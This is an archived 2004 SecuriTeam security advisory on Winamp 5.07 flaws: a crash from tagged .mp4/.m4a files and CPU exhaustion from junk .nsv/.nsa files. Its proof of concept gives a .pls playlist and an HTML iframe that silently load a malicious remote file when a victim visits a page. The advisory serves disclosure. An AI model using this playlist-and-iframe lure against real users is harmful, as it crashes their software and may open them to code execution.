[NT] Multiple Vulnerabilities in WinAMP (MP4 and NSV files)
From: SecuriTeam (support_at_securiteam.com)
Date: 12/20/04
- Previous message: SecuriTeam: "[NEWS] Yahoo! Mail Cross-Site Scripting Vulnerability"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: list@securiteam.com Date: 20 Dec 2004 18:25:22 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Multiple Vulnerabilities in WinAMP (MP4 and NSV files)
------------------------------------------------------------------------
SUMMARY
<http://winamp.com/> Winamp is a popular media player for Microsoft
Windows .
Multiple vulnerabilities allow a remote attacker to crash the victim's
Winamp and possibly run arbitrary code.
DETAILS
Vulnerable Systems:
* Winamp 5.07
Vulnerability Processing .MP4 and M4A Files:
There is a vulnerability in WinAMP's handling of .mp4 and .m4a files. When
exploited this vulnerability remotely crash the victim's Winamp. The
vulnerability lies in the .mp4 tagging system. If you use WinAMP's built
in feature to edit the tags on .mp4 or .m4a
files and insert any data in there the next time the file is opened it
will instantly crash Winamp.
Proof of Concept:
Create a .pls file containing the data:
[playlist]
numberofentries=5
File1=http://b0f.pwp.blueyonder.co.uk/a.mp4
Title1=
Length5=-1
Version=2
Make an HTML page containing an IFRAME linking to the .pls like:
< html>
< iframe src="http://b0f.pwp.blueyonder.co.uk/exp2.pls">
If the victim clicks a link to a page containing this code, like:
<http://b0f.pwp.blueyonder.co.uk/wexp3.htm>
http://b0f.pwp.blueyonder.co.uk/wexp3.htm
The playlist file will open automatically and try to play the malicious
file. This will crash the victim's Winamp. This could also be done with
m3u instead of .pls
Resource Consumption With .nsv and .nsa Files:
This one is simple. if you create for example a 1mb file (probably smaller
will do) filled with junk, and name it with either .nsv or .nsa file
extension. Once opened in Winamp, the file will cause the CPU usage to
spike to 100%. The bigger the size of the file the longer it will take the
system to recover.
ADDITIONAL INFORMATION
The information has been provided by <mailto:b0fnet@yahoo.com> Alan M aka
b0f.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: SecuriTeam: "[NEWS] Yahoo! Mail Cross-Site Scripting Vulnerability"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
- [UNIX] Trend Micro VirusWall Buffer Overflow in VSAPI Library
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... buffer overflow vulnerability
in VSAPI library allows arbitrary code ... is called "vscan" which is set suid root by
default. ... permissions and thus granted all local users the privilege to execute the
... (Securiteam) - [UNIX] SCO Multiple Local Buffer Overflow
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... Local exploitation of a buffer
overflow vulnerability in the ppp binary, ... allows attackers to gain root privileges.
... (Securiteam) - [NT] Microsoft Word 6.0/95 Document Converter Buffer Overflow (MS04-041)
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... WordPad is "a word processing
application that uses the MFC rich edit ... Remote exploitation of a buffer overflow vulnerability
in Microsoft ... Microsoft Word format files into the Rich Text Format natively handled
by ... (Securiteam) - [UNIX] Tikiwiki Command Injection and Arbitrary File Exposure Vulnerabilities
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... Two security vulnerabilities have
been recently discovered in Tikiwiki, ... Remote exploitation of an input validation
vulnerability in Tikiwiki ... allows attackers to gain access to arbitrary files on
the vulnerable ... (Securiteam) - [NT] Ipswitch Multiple Vulnerabilities (IMail IMAP LIST Command DoS, Collaboration Suite SMTP Format
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... Ipswitch Multiple Vulnerabilities
(IMail IMAP LIST Command DoS, ... Collaboration Suite SMTP Format String) ... Remote
exploitation of a denial of service vulnerability in Ipswitch ... (Securiteam)